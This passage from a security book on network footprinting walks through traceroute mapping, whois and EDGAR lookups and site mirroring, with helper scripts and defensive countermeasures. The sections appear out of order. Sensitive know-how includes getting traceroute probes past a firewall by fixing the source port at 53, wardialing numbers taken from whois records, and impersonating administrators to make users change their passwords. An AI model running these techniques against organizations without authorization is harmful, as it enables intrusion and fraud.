Signatures (TSIGs) to allow only “trusted” hosts to transfer zone information. For a
step-by-step example of how to implement TSIG security, see
http://romana.ucd.ie/james/tsig.html.
Restricting zone transfers will increase the time necessary for attackers to probe for
IP addresses and hostnames. However, since name lookups are still allowed, attackers
could manually perform lookups against all IP addresses for a given net block. Therefore,
configure external name servers to provide information only about systems directly
connected to the Internet. External nameservers should never be configured to
divulge internal network information. This may seem like a trivial point, but we have
seen misconfigured nameservers that allowed us to pull back more than 16,000 internal IP
addresses and associated hostnames. Finally, we discourage the use of HINFO records. As
you will see in later chapters, you can identify the target system’s operating system with
fine precision. However, HINFO records make it that much easier to programmatically
cull potentially vulnerable systems.
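The point about manual lookups is easy to verify against your own external nameserver: generate the reverse-lookup name for every address in a net block and see which ones it answers. The sketch below only generates the names for a /24 network; the function name ptr_names is hypothetical.

```shell
# ptr_names A.B.C: print the in-addr.arpa name for every host address
# (1 through 254) in the /24 network A.B.C.0.
ptr_names() {
    old_ifs=$IFS
    IFS=.
    set -- $1                 # split "A.B.C" into $1, $2, $3
    IFS=$old_ifs
    host=1
    while [ "$host" -le 254 ]; do
        echo "$host.$3.$2.$1.in-addr.arpa"
        host=$((host + 1))
    done
}
```

Each name can then be queried for a PTR record. Any internal hostname that comes back from an external server is information that should not be published there.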
Step 4. Network Reconnaissance
Now that we have identified potential networks, we can attempt to determine their network
topology as well as potential access paths into the network.
Tracerouting
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
To accomplish this task, we can use the traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.gz)
program that comes with most flavors of UNIX and is provided in Windows
NT. In Windows NT, it is spelled tracert due to the 8.3 legacy filename issues.
Traceroute is a diagnostic tool originally written by Van Jacobson that lets you
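view the route that an IP packet follows from one host to the next. Traceroute uses the
time-to-live (TTL) field in the IP header to elicit an ICMP TIME_EXCEEDED message
from each router. Each router that handles the packet is required to decrement the TTL
field and, when it reaches zero, to discard the packet and report the error to the sender.
By sending probes with TTL values of 1, 2, 3, and so on, traceroute hears from each
router in turn. Thus, the TTL field effectively becomes a hop counter. We can use the functionality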
of traceroute to determine the exact path that our packets are taking. As mentioned
previously, traceroute may allow you to discover the network topology employed by
the target network, in addition to identifying access control devices (application-based
firewall or packet-filtering routers) that may be filtering our traffic.
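The TTL mechanism can be illustrated without sending any packets. The sketch below is a toy simulation, not traceroute itself: given the nodes on a path (routers first, destination last), it shows which node answers a probe sent with each initial TTL. The function name simulate_trace is our own.

```shell
# simulate_trace NODE...: model probes sent with TTL 1, 2, 3, ... along a
# path whose last NODE is the destination. Every router decrements the TTL;
# the router that brings it to zero answers with TIME_EXCEEDED.
simulate_trace() {
    total=$#
    ttl=1
    while [ "$ttl" -le "$total" ]; do
        left=$ttl
        i=0
        for node in "$@"; do
            i=$((i + 1))
            if [ "$i" -eq "$total" ]; then
                echo "ttl=$ttl $node (destination reached)"
                break
            fi
            left=$((left - 1))             # this router decrements the TTL
            if [ "$left" -eq 0 ]; then
                echo "ttl=$ttl $node TIME_EXCEEDED"
                break
            fi
        done
        ttl=$((ttl + 1))
    done
}
```

Calling simulate_trace gate2 rtr1 rtr2 hssitrt gate.Acme.net prints one line per TTL value, with the first four answered by routers and the fifth by the destination.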
Let’s look at an example:
[bash]$ traceroute Acme.net
traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets
1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms
2 rtr1.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms
3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms
4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms
5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms
We can see the path of the packets leaving the router (gate) and traveling three hops
(2–4) to the final destination. The packets go through the various hops without being
blocked. From our earlier work, we know that the MX record for Acme.net points to
gate.acme.net. Thus, we can assume this is a live host and that the hop before it (4) is the
border router for the organization. Hop 4 could be a dedicated application-based
firewall, or it could be a simple packet-filtering device—we are not sure yet. Generally,
once you hit a live system on a network, the system before it is a device performing routing
functions (for example, a router or a firewall).
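When many hosts are traced, picking out the hop just before each destination by eye becomes tedious. The following sketch extracts it from saved traceroute output. It assumes the output format shown above (hop number, name, address in parentheses), and the function name hop_before_destination is hypothetical.

```shell
# hop_before_destination: read traceroute output on stdin and print the
# name and address of the hop immediately before the last hop listed.
# Prints an empty line if fewer than two hops are present.
hop_before_destination() {
    awk '$1 ~ /^[0-9]+$/ { prev = last; last = $2 " " $3 }
         END { print prev }'
}
```

For the trace to Acme.net above, this prints "hssitrt.bigisp.net (10.11.31.14)". If the trace ends in rows of asterisks, the result is not meaningful and should be ignored.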
This is a very simplistic example. But in a complex environment, there may be multiple
routing paths, that is, routing devices with multiple interfaces (for example, a Cisco 7500 series
router). Moreover, each interface may have different access control lists (ACLs) applied.
In many cases, some interfaces will pass your traceroute requests, while others will deny
them because of the ACL applied. Thus, it is important to map your entire network using
traceroute. After you traceroute to multiple systems on the network, you can begin to
create a network diagram that depicts the architecture of the Internet gateway and the location
of devices that are providing access control functionality. We refer to this as an access
path diagram.
It is important to note that most flavors of traceroute in UNIX default to sending
User Datagram Protocol (UDP) packets, with the option of using Internet Control
Message Protocol (ICMP) packets with the -I switch. In Windows NT, however, the
default behavior is to use ICMP echo request packets. Thus, your mileage may vary using
each tool if the site blocks UDP vs. ICMP and vice versa. Another interesting option of
traceroute is the -g option, which allows the user to specify loose source routing.
Thus, if you believe the target gateway will accept source-routed packets (which is a cardinal
sin), you might try to enable this option with the appropriate hop pointers (see man
traceroute in UNIX for more information).
There are several other switches that we need to discuss that may allow you to bypass
access control devices during your probe. The -p n option of traceroute allows you to
specify a starting UDP port number (n) that will be incremented by 1 each time a probe is
launched. Thus, we will not be able to use a fixed port number without some modification to
traceroute. Luckily, Michael Schiffman has created a patch
(http://www.packetfactory.net/Projects/firewalk/traceroute.diff) that adds the -S switch to stop
port incrementation for traceroute version 1.4a5
(ftp.cerias.purdue.edu/pub/tools/unix/netutils/traceroute/old/).
This allows you to force every packet you send to have a fixed port number, in the
hopes that the access control device will pass this traffic. A good starting port number
would be UDP port 53 (DNS queries). Since many sites allow inbound DNS queries, there is
a high probability that the access control device will allow our probes through.
[bash]$ traceroute 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms
2 rtr1.bigisp.net (10.10.12.13) 37.442 ms 35.183 ms 38.202 ms
3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms
4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms
5 * * *
6 * * *
We can see here that our traceroute probes, which by default send out UDP packets,
were blocked by the firewall.
Now let’s send a probe with a fixed port of UDP 53, DNS queries:
[bash]$ traceroute -S -p53 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms
2 rtr1.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms
3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
4 hssitrt.bigisp.net (10.11.31.14) 47.352 ms 47.363 ms 45.914 ms
5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms
Because our packets are now acceptable to the access control devices (hop 4), they are
happily passed. Thus, we can probe systems behind the access control device just by
sending out probes with a destination port of UDP 53. Additionally, if you send a probe
to a system that has UDP port 53 listening, you will not receive a normal ICMP unreachable
message back. Thus, you will not see a host displayed when the packet reaches its ultimate
destination.
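The reason the stock -p option is not enough on its own comes down to simple arithmetic. The sketch below lists the destination port each probe would carry when the port grows by one per probe. It assumes three probes per hop and, purely for illustration, that the first probe uses the starting port itself; some implementations begin one port higher. The function name probe_ports is our own.

```shell
# probe_ports BASE HOPS [PROBES_PER_HOP]: print the destination port of
# every probe when the port is incremented by one for each probe sent.
# Assumptions: the first probe uses BASE; three probes per hop by default.
probe_ports() {
    base=$1
    hops=$2
    per_hop=${3:-3}
    hop=1
    sent=0
    while [ "$hop" -le "$hops" ]; do
        line="hop $hop:"
        q=0
        while [ "$q" -lt "$per_hop" ]; do
            line="$line $((base + sent))"
            sent=$((sent + 1))
            q=$((q + 1))
        done
        echo "$line"
        hop=$((hop + 1))
    done
}
```

With probe_ports 53 5, only the very first probe is addressed to port 53, and by hop 5 the probes are aimed at ports in the 60s, which the access control device has no reason to pass. Holding the port fixed, as the patched -S switch does, keeps every probe on port 53.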
Most of what we have done up to this point with traceroute has been command-line
oriented. For the graphically inclined, you can use VisualRoute (http://www.visualroute.com)
or NeoTrace (http://www.neotrace.com/) to perform your tracerouting.
VisualRoute provides a graphical depiction of each network hop and integrates this with
whois queries. VisualRoute, depicted in Figure 1-6, is appealing to the eye, but does not
scale well for large-scale network reconnaissance.
There are additional techniques that will allow you to determine specific ACLs that
are in place for a given access control device. Firewall protocol scanning is one such technique
and is covered in Chapter 11.
Countermeasure: Thwarting Network Reconnaissance
In this chapter, we only touched upon network reconnaissance techniques. We shall see
more intrusive techniques in the following chapters. There are, however, several countermeasures
that can be employed to thwart and identify the network reconnaissance probes
discussed thus far. Many of the commercial network intrusion detection systems (NIDSes)
will detect this type of network reconnaissance. In addition, one of the best free NIDS programs,
snort (http://www.snort.org/) by Marty Roesch, can detect this activity. If you are
interested in taking the offensive when someone traceroutes to you, Humble from Rhino9
developed a program called RotoRouter
(http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz). This utility is used to log incoming
traceroute requests and generate fake
responses. Finally, depending on your site’s security paradigm, you may be able to configure
your border routers to limit ICMP and UDP traffic to specific systems, thus minimizing
your exposure.
Figure 1-6. VisualRoute, the Cadillac of traceroute tools, provides not just router hop information
but also geographic location, whois lookups, and web server banner information.
SUMMARY
As you have seen, attackers can perform network reconnaissance or footprint your network
in many different ways. We have purposely limited our discussion to common
tools and techniques. Bear in mind, however, that new tools are released daily. Moreover,
we chose a simplistic example to illustrate the concepts of footprinting. Often you will be
faced with a daunting task of trying to identify and footprint tens or hundreds of domains.
Therefore, we prefer to automate as many tasks as possible via a combination of
shell and expect scripts or perl programs. In addition, there are many attackers well
schooled in performing network reconnaissance activities without ever being discovered,
and they are suitably equipped. Thus, it is important to remember to minimize the
amount and types of information leaked by your Internet presence and to implement vigilant
monitoring.
Footprinting
Before the real fun for the hacker begins, three essential steps must be performed.
This chapter will discuss the first one—footprinting—the fine art of gathering target
information. For example, when thieves decide to rob a bank, they don’t just walk
in and start demanding money (not the smart ones, anyway). Instead, they take great
pains in gathering information about the bank—the armored car routes and delivery
times, the video cameras, and the number of tellers, escape exits, and anything else that
will help in a successful misadventure.
The same requirement applies to successful attackers. They must harvest a wealth of
information to execute a focused and surgical attack (one that won’t be readily caught).
As a result, attackers will gather as much information as possible about all aspects of an
organization’s security posture. Hackers end up with a unique footprint or profile of the target’s
Internet, remote access, and intranet/extranet presence. By following a structured methodology,
attackers can systematically glean information from a multitude of sources to
compile this critical footprint on any organization.
WHAT IS FOOTPRINTING?
The systematic footprinting of an organization enables attackers to create a complete profile
of an organization’s security posture. By using a combination of tools and techniques,
attackers can take an unknown quantity (Widget Company’s Internet connection) and reduce
it to a specific range of domain names, network blocks, and individual IP addresses
of systems directly connected to the Internet. While there are many types of footprinting
techniques, they are primarily aimed at discovering information related to the following
environments: Internet, intranet, remote access, and extranet. Table 1-1 depicts these environments
and the critical information an attacker will try to identify.
Why Is Footprinting Necessary?
Footprinting is necessary to systematically and methodically ensure that all pieces of information
related to the aforementioned technologies are identified. Without a sound
methodology for performing this type of reconnaissance, you are likely to miss key pieces
of information related to a specific technology or organization. Footprinting is often the
most arduous task of trying to determine the security posture of an entity; however, it is
one of the most important. Footprinting must be performed accurately and in a controlled
fashion.
INTERNET FOOTPRINTING
While many footprinting techniques are similar across technologies (Internet and
intranet), this chapter will focus on footprinting an organization’s Internet connection(s).
Remote access will be covered in detail in Chapter 9.
It is difficult to provide a step-by-step guide on footprinting because it is an activity
that may lead you down several paths. However, this chapter delineates basic steps that
should allow you to complete a thorough footprint analysis. Many of these techniques
can be applied to the other technologies mentioned earlier.
Technology      Identifies
Internet        Domain name
                Network blocks
                Specific IP addresses of systems reachable via the Internet
                TCP and UDP services running on each system identified
                System architecture (for example, SPARC vs. X86)
                Access control mechanisms and related access control lists (ACLs)
                Intrusion detection systems (IDSes)
                System enumeration (user and group names, system banners,
                  routing tables, SNMP information)
Intranet        Networking protocols in use (for example, IP, IPX, DecNET,
                  and so on)
                Internal domain names
                Network blocks
                Specific IP addresses of systems reachable via intranet
                TCP and UDP services running on each system identified
                System architecture (for example, SPARC vs. X86)
                Access control mechanisms and related access control lists (ACLs)
                Intrusion detection systems
                System enumeration (user and group names, system banners,
                  routing tables, SNMP information)
Remote access   Analog/digital telephone numbers
                Remote system type
                Authentication mechanisms
                VPNs and related protocols (IPSEC, PPTP)
Extranet        Connection origination and destination
                Type of connection
                Access control mechanism
Table 1-1. Environments and the Critical Information Attackers Can Identify
Step 1. Determine the Scope of Your Activities
The first item to address is to determine the scope of your footprinting activities. Are you
going to footprint an entire organization, or are you going to limit your activities to certain
locations (for example, corporate vs. subsidiaries)? In some cases, it may be a daunting
task to determine all the entities associated with a target organization. Luckily, the
Internet provides a vast pool of resources you can use to help narrow the scope of activities
and also provides some insight as to the types and amount of information publicly
available about your organization and its employees.
Open Source Search
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
As a starting point, peruse the target organization’s web page if they have one. Many
times an organization’s web page provides a ridiculous amount of information that can
aid attackers. We have actually seen organizations list security configuration options for
their firewall system directly on their Internet web server. Other items of interest include
- Locations
- Related companies or entities
- Merger or acquisition news
- Phone numbers
- Contact names and email addresses
- Privacy or security policies indicating the types of security mechanisms in place
- Links to other web servers related to the organization
In addition, try reviewing the HTML source code for comments. Many items not
listed for public consumption are buried in HTML comments, which begin with “<!--”
and end with “-->.” Viewing the source code offline may be faster than viewing it online, so it is often
beneficial to mirror the entire site for offline viewing. Having a copy of the site locally may
allow you to programmatically search for comments or other items of interest, thus making
your footprinting activities more efficient. Wget (http://www.gnu.org/software/wget/wget.html)
for UNIX and Teleport Pro (http://www.tenmax.com/teleport/home.htm)
for Windows are great utilities to mirror entire web sites.
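Once a site has been mirrored (for example, with wget -m), the search for comments can be scripted. The sketch below lists every line in the mirrored .html and .htm files that opens an HTML comment. The function name find_html_comments and the directory layout are assumptions; comments that continue over several lines will show only their first line.

```shell
# find_html_comments DIR: print "file:line:text" for every line under DIR
# (in .html and .htm files) that contains the start of an HTML comment.
find_html_comments() {
    # /dev/null is passed as an extra file so grep always prints filenames.
    find "$1" -type f \( -name '*.html' -o -name '*.htm' \) \
        -exec grep -n -e '<!--' /dev/null {} +
}
```

Site owners can run the same check on their own document root before publishing to catch comments that were never meant for public consumption.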
After studying web pages, you can perform open source searches for information relating
to the target organization. News articles, press releases, and so on, may provide additional
clues about the state of the organization and their security posture. Web sites
such as finance.yahoo.com or http://www.companysleuth.com provide a plethora of information.
If you are profiling a company that is mostly Internet based, you may find by
searching for related news stories that they have had numerous security incidents. Using
your web search engine of choice will suffice for this activity. However, there are more
advanced searching tools and criteria you can use to uncover additional information.
The FerretPRO suite of search tools from FerretSoft (http://www.ferretsoft.com) is
one of our favorites. WebFerretPRO enables you to search many different search engines
simultaneously. In addition, other tools in the suite allow you to search IRC, USENET,
email, and file databases looking for clues. Also, if you’re looking for a free solution to
search multiple search engines, check out http://www.dogpile.com.
Searching USENET for postings related to @example.com often reveals useful information.
In one case, we saw a posting from a system administrator’s work account regarding
his new PBX system. He said this switch was new to him, and he didn’t know
how to turn off the default accounts and passwords. We’d hate to guess how many phone
phreaks were salivating over the prospect of making free calls at that organization. Needless
to say, you can gain additional insight into the organization and the technical prowess
of its staff just by reviewing their postings.
Lastly, you can use the advanced searching capabilities of some of the major search
engines like AltaVista or Hotbot. These search engines provide a handy facility that allows
you to search for all sites that have links back to the target organization’s domain. This
may not seem significant at first, but let’s explore the implications. Suppose someone in
an organization decides to put up a rogue web site at home or on the target network’s site.
This web server may not be secure or sanctioned by the organization. So we can begin to
look for potential rogue web sites just by determining which sites actually link to the target
organization’s web server, as shown in Figure 1-1.
You can see that the search returned all sites that link back to http://www.l0pht.com
and that contain the word “hacking.” So you could easily use this search facility to find
sites linked to your target domain.
The last example, depicted in Figure 1-2, allows you to limit your search to a particular
site. In our example, we searched http://www.l0pht.com for all occurrences of
“mudge.” This query could easily be modified to search for other items of interest.
Obviously, these examples don’t cover every conceivable item to search for during
your travels—be creative. Sometimes the most outlandish search yields the most productive
results.
EDGAR Search
For targets that are publicly traded companies, you can consult the Securities and Exchange
Commission (SEC) EDGAR database at http://www.sec.gov, as shown in Figure 1-3.
One of the biggest problems organizations have is managing their Internet connections,
especially when they are actively acquiring or merging with other entities. So it is
important to focus on newly acquired entities. Two of the best SEC publications to review
are the 10-Q and 10-K. The 10-Q is a quick snapshot of what the organization has done
over the last quarter. This update includes the purchase or disposition of other entities.
The 10-K is a yearly update of what the company has done and may not be as timely as the
10-Q. It is a good idea to peruse these documents by searching for “subsidiary” or “subsequent
events.” This may provide you with information on a newly acquired entity. Often
organizations will scramble to connect the acquired entities to their corporate network
with little regard for security. So it is likely that you may be able to find security weaknesses
in the acquired entity that would allow you to leapfrog into the parent company. Attackers
are opportunistic and are likely to take advantage of the chaos that normally comes
with combining networks.
Figure 1-1. With the AltaVista search engine, use the link:www.example.com directive to
query all sites with links back to the target domain.
With an EDGAR search, keep in mind that you are looking for entity names that are
different from the parent company. This will become critical in subsequent steps when
you perform organizational queries from the various whois databases available (see
“Step 2. Network Enumeration”).
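The keyword search suggested for 10-Q and 10-K filings is simple to script once the filings have been saved as text files. The sketch below is a minimal example; the function name scan_filing is hypothetical, and the search terms are the two mentioned above.

```shell
# scan_filing FILE...: print the numbered lines of each saved filing that
# mention a subsidiary or subsequent events (case-insensitive).
scan_filing() {
    grep -n -i -E 'subsidiar(y|ies)|subsequent events' "$@"
}
```

When several files are given, grep prefixes each match with the filename, which makes it easy to see which filing introduced an unfamiliar entity name.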
Countermeasure: Public Database Security
Much of the information discussed earlier must be made publicly available; this is especially
true for publicly traded companies. However, it is important to evaluate and classify
the type of information that is publicly disseminated. The Site Security Handbook (RFC
2196) can be found at http://www.ietf.org/rfc/rfc2196.txt and is a wonderful resource
for many policy-related issues. Finally, remove any unnecessary information from your
web pages that may aid an attacker in gaining access to your network.
Figure 1-2. With AltaVista, use the host:example.com directive to query the site for the
specified string (for example, “mudge”).
Step 2. Network Enumeration
Popularity: 9
Simplicity: 9
Impact: 5
Risk Rating: 8
The first step in the network enumeration process is to identify domain names and
associated networks related to a particular organization. Domain names represent the
company’s presence on the Internet and are the Internet equivalent to your company’s
name, such as “AAAApainting.com” and “moetavern.com.”
Figure 1-3. The EDGAR database allows you to query public documents, providing important
insight into the breadth of the organization by identifying its associated entities.
To enumerate these domains and begin to discover the networks attached to them,
you must scour the Internet. There are multiple whois databases you can query that will
provide a wealth of information about each entity we are trying to footprint. Before the
end of 1999, Network Solutions had a monopoly as the main registrar for domain names
(com, net, edu, and org) and maintained this information on their whois servers. This
monopoly was dissolved and currently there is a multitude of accredited registrars
(http://www.internic.net/alpha.html). Having new registrars available adds steps in
finding our targets (see “Registrar Query” later in this step). We will need to query the
correct registrar for the information we are looking for.
There are many different mechanisms (see Table 1-2) to query the various whois databases.
Regardless of the mechanism, you should still receive the same information. Users
should consult Table 1-3 for other whois servers when looking for domains other than
com, net, edu, or org. Another valuable resource, especially for finding whois servers outside
of the United States, is http://www.allwhois.com. This is one of the most complete
whois resources on the Internet.
Mechanism                Resources                                     Platform
Web interface            http://www.networksolutions.com/              Any platform with a web client
                         http://www.arin.net
Whois client             Whois is supplied with most versions          UNIX
                           of UNIX.
                         Fwhois was created by Chris Cappuccio
WS_Ping ProPack          http://www.ipswitch.com/                      Windows 95/NT/2000
Sam Spade                http://www.samspade.org/ssw                   Windows 95/NT/2000
Sam Spade Web Interface  http://www.samspade.org/                      Any platform with a web client
Netscan tools            http://www.netscantools.com/nstpromain.html   Windows 95/NT/2000
Xwhois                   http://c64.org/~nr/xwhois/                    UNIX with X and GTK+ GUI toolkit
Table 1-2. Whois Searching Techniques and Data Sources
Different information can be gleaned with each query. The following query types
provide the majority of information hackers use to begin their attack:
- Registrar: Displays specific registrar information and associated whois servers
- Organizational: Displays all information related to a particular organization
- Domain: Displays all information related to a particular domain
- Network: Displays all information related to a particular network or a single
  IP address
- Point of contact (POC): Displays all information related to a specific person,
  typically the administrative contact
Registrar Query
With the advent of the shared registry system (that is, multiple registrars), we must consult
the whois.crsnic.net server to obtain a listing of potential domains that match our
target and their associated registrar information. We need to determine the correct registrar
so that we can submit detailed queries to the correct database in subsequent steps.
For our example, we will use “Acme Networks” as our target organization and perform
our query from a UNIX (Red Hat 6.2) command shell. In the version of whois we are using,
the @ option allows you to specify an alternate database. In some BSD-derived
whois clients (for example, OpenBSD or FreeBSD), it is possible to use the -a option to
specify an alternate database. Consult man whois for more information on how to submit
whois queries with your whois client.
It is advantageous to use a wildcard when performing this search because it will provide
additional search results. Using a “.” after “acme” will list all occurrences of domains that
begin with “acme” rather than domains that simply match “acme” exactly. In addition,
consult http://www.networksolutions.com/en_US/help/whoishelp.html for additional
information on submitting advanced searches. Many of the hints contained in this document
can help you dial in your search with much more precision.
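Under the hood, a command-line whois client does very little: it opens a TCP connection to port 43 on the chosen server, sends the query followed by a carriage return and line feed, and reads until the server closes the connection. The following Python sketch illustrates that exchange. The function names are our own, and whois.crsnic.net is simply the server named in this step; it may no longer answer queries in this form.

```python
import socket

WHOIS_PORT = 43  # well-known whois service port


def build_query(query: str) -> bytes:
    """Encode a whois query: the query text terminated by CRLF."""
    return query.encode("ascii") + b"\r\n"


def whois(query: str, server: str, timeout: float = 10.0) -> str:
    """Send one query to a whois server and return the raw reply text."""
    with socket.create_connection((server, WHOIS_PORT), timeout=timeout) as sock:
        sock.sendall(build_query(query))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # the server closes the connection when it is done
                break
            chunks.append(data)
    # latin-1 never fails to decode, which suits free-form registry text
    return b"".join(chunks).decode("latin-1")
```

Calling whois("acme.", "whois.crsnic.net") would correspond to the wildcard registrar query used in this step. Passing the server as an argument plays the same role as the @ syntax of the command-line client.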
Whois Server                          Addresses
European IP Address Allocations       http://www.ripe.net/
Asia Pacific IP Address Allocations   http://whois.apnic.net
U.S. military                         http://whois.nic.mil
U.S. government                       http://whois.nic.gov
Table 1-3. Government, Military, and International Sources of Whois Databases
[bash]$ whois "acme."@whois.crsnic.net
[whois.crsnic.net]
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
ACMETRAVEL.COM
ACMETECH.COM
ACMES.COM
ACMERACE.NET
ACMEINC.COM
ACMECOSMETICS.COM
ACME.ORG
ACME.NET
ACME.COM
ACME-INC.COM
If we are interested in obtaining more information on acme.net, we can continue to
drill down further to determine the correct registrar.
[bash]$ whois "acme.net"@whois.crsnic.net
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: ACME.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.ACME.NET
Name Server: DNS2.ACME.NET
We can see that Network Solutions is the registrar for this organization, which is quite
common for any organization that was on the Internet before adoption of the shared registry system.
For subsequent queries, we must query the respective registrar’s database because
they maintain the detailed information we want.
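When many domains must be checked, picking the registrar and its whois server out of each reply by eye becomes tedious. The Python sketch below shows one way to pull the "Key: value" lines out of a registry reply like the one above. The function name and the sample constant are our own, and the parsing rule (split on a colon followed by a space) is an assumption based solely on the output shown here.

```python
SAMPLE_REPLY = """\
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: ACME.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.ACME.NET
Name Server: DNS2.ACME.NET
"""


def parse_referral(reply: str) -> dict:
    """Collect 'Key: value' lines; repeated keys are gathered into lists."""
    fields = {}
    for line in reply.splitlines():
        # Splitting on ": " (colon plus space) skips URLs such as http://...
        key, sep, value = line.partition(": ")
        key, value = key.strip(), value.strip()
        if not sep or not key or not value:
            continue  # banner text, blank lines
        fields.setdefault(key, []).append(value)
    return fields


fields = parse_referral(SAMPLE_REPLY)
print(fields["Registrar"][0], "->", fields["Whois Server"][0])
```

The value under "Whois Server" is the host to which the subsequent organizational, domain, and POC queries should be sent.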
Organizational Query
Once we have identified a registrar, we can submit an organizational query. This type of
query will search a specific registrar for all instances of the entity name and is broader
than looking for just a domain name. We must use the keyword “name” and submit the
query to Network Solutions.
[bash]$ whois "name Acme Networks"@whois.networksolutions.com
Acme Networks (NAUTILUS-AZ-DOM) NAUTILUS-NJ.COM
Acme Networks (WINDOWS4-DOM) WINDOWS.NET
Acme Networks (BURNER-DOM) BURNER.COM
Acme Networks (ACME2-DOM) ACME.NET
Acme Networks (RIGHTBABE-DOM) RIGHTBABE.COM
Acme Networks (ARTS2-DOM) ARTS.ORG
Acme Networks (HR-DEVELOPMENT-DOM) HR-DEVELOPMENT.COM
Acme Networks (NTSOURCE-DOM) NTSOURCE.COM
Acme Networks (LOCALNUMBER-DOM) LOCALNUMBER.NET
Acme Networks (LOCALNUMBERS2-DOM) LOCALNUMBERS.NET
Acme Networks (Y2MAN-DOM) Y2MAN.COM
Acme Networks (Y2MAN2-DOM) Y2MAN.NET
Acme Networks for Christ Hospital (CHOSPITAL-DOM) CHOSPITAL.ORG
...
From this, we can see many different domains are associated with Acme Networks.
However, are there real networks associated with those domains, or have they been registered
for future use or to protect a trademark? We need to continue drilling down until
we find a live network.
When you are performing an organizational query for a large organization, there may
be hundreds or thousands of records associated with it. Before spamming became so
popular, it was possible to download the entire com domain from Network Solutions.
Knowing this, Network Solutions whois servers will truncate the results and only display
the first 50 records.
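A listing of this size is easier to work with once it has been broken into fields. The Python sketch below splits each line of an organizational query reply into entity name, registry handle, and domain. The regular expression is an assumption derived only from the sample output above (handles ending in -DOM, one record per line); other registrars may format their replies differently.

```python
import re

# entity name, then "(HANDLE-DOM)", then the domain name
ORG_LINE = re.compile(
    r"^(?P<org>.+?)\s*\((?P<handle>[A-Z0-9-]+-DOM)\)\s+(?P<domain>\S+)$"
)

SAMPLE_LISTING = """\
Acme Networks (NAUTILUS-AZ-DOM) NAUTILUS-NJ.COM
Acme Networks (ACME2-DOM) ACME.NET
Acme Networks for Christ Hospital (CHOSPITAL-DOM) CHOSPITAL.ORG
...
"""


def parse_org_listing(reply: str) -> list:
    """Return (entity, handle, domain) tuples; unparsable lines are skipped."""
    records = []
    for line in reply.splitlines():
        match = ORG_LINE.match(line.strip())
        if match:
            records.append(
                (match.group("org"), match.group("handle"),
                 match.group("domain").lower())
            )
    return records


for org, handle, domain in parse_org_listing(SAMPLE_LISTING):
    print(f"{domain:20} {handle:20} {org}")
```

Each domain in the result is a candidate for the domain query that follows; the handle identifies the same record in the registrar's database.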
Domain Query
Based on our organizational query, the most likely candidate to start with is the Acme.net
domain since the entity is Acme Networks. (Of course, all real names and references have
been changed.)
[bash]$ whois acme.net@whois.networksolutions.com
[whois.networksolutions.com]
Registrant:
Acme Networks (ACME2-DOM)
11 Town Center Ave.
Einstein, AZ 21098
Domain Name: ACME.NET
Administrative Contact, Technical Contact, Zone Contact:
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
201-555-9011 (201)555-3338 (FAX) 201-555-1212
Record last updated on 13-Sep-95.
Record created on 30-May-95.
Database last updated on 14-Apr-99 13:20:47 EDT.
Domain servers in listed order:
DNS.ACME.NET 10.10.10.1
DNS2.ACME.NET 10.10.10.2
This type of query provides you with information related to the following:
- The registrant
- The domain name
- The administrative contact
- When the record was created and updated
- The primary and secondary DNS servers
At this point, you need to become a bit of a cybersleuth. Analyze the information for
clues that will provide you with more information. We commonly refer to excess information
or information leakage as “enticements.” That is, they may entice an attacker into
mounting a more focused attack. Let us review this information in detail.
By inspecting the registrant information, we can ascertain if this domain belongs to
the entity that we are trying to footprint. We know that Acme Networks is located in Arizona,
so it is safe to assume this information is relevant to our footprint analysis. Keep in
mind, the registrant’s locale doesn’t necessarily have to correlate to the physical locale of
the entity. Many entities have multiple geographic locations, each with its own Internet
connections; however, they may all be registered under one common entity. For your domain,
it would be necessary to review the location and determine if it was related to your
organization. The domain name is the same domain name that we used for our query, so
this is nothing new to us.
The administrative contact is an important piece of information because it may tell
you the name of the person responsible for the Internet connection or firewall. It also lists
voice and fax numbers. This information is an enormous help when you’re performing a
dial-in penetration review. Just fire up the wardialers in the noted range, and you’re off to
a good start in identifying potential modem numbers. In addition, an intruder will often
pose as the administrative contact, using social engineering on unsuspecting users in an
organization. An attacker will send spoofed email messages posing as the administrative
contact to a gullible user. It is amazing how many users will change their password to
whatever you like, as long as it looks like the request is being sent from a trusted technical
support person.
The record creation and modification dates indicate how accurate the information is.
If the record was created five years ago but hasn’t been updated since, it is a good bet
some of the information (for example, Administrative Contact) may be out of date.
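The age check described above is easy to automate. The Python sketch below extracts the "Record created" and "Record last updated" dates from a domain record and reports how stale the record is. The function names are our own, and the date format (for example, 13-Sep-95) is assumed from the sample output shown earlier; two-digit years are interpreted by Python's usual rule, so 95 becomes 1995.

```python
import re
from datetime import date, datetime

RECORD_DATE = re.compile(
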